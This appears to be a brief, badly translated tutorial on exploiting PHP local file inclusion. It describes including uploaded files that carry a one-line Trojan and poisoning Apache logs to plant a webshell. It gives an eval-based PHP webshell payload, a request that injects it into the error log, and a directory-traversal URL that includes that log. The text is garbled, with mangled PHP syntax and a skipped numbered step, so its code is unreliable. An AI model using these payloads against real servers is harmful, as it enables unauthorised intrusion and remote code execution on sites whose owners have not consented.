In the Allow_url_include=on is the remote file contains, assuming this is off, it can only be included locally.
1. include upload file
As long as the target server support upload, whether it is jpg,txt,gif, etc. can be included in a sentence Trojan can, this method is very simple nothing to say.
3. log contains log file
The log contains, this is still more practical, general Apache or other log will be larger, and why we can through the log Getwebshell? For example, Apache, when we visit a website page, the page error, the server will record the access to the connection address, if we bring malicious code then this will be included in the log file. So our general use of the steps are:
First visit a page that cannot exist and carry malicious code, such as the Evil Code:
<?php fputs (fopen ("/www/shell.php", "w+"), "<?php eval ($_post[a]?>";? >
Convert it to URL encoding, and then access the
Http://www.81sec.com/+urlencode (Evil Code)
This page certainly does not exist, then in the error log will form a log, and then we will include this log:
Http://www.81sec.com/test.php?p=../../../../var/logs/apache/www_error.log
Apache path need to guess the solution, I just give an instance, after the visit will generate a shell.
This bit, think of a feasible method.
PHP LFI local file Include, native Package vulnerability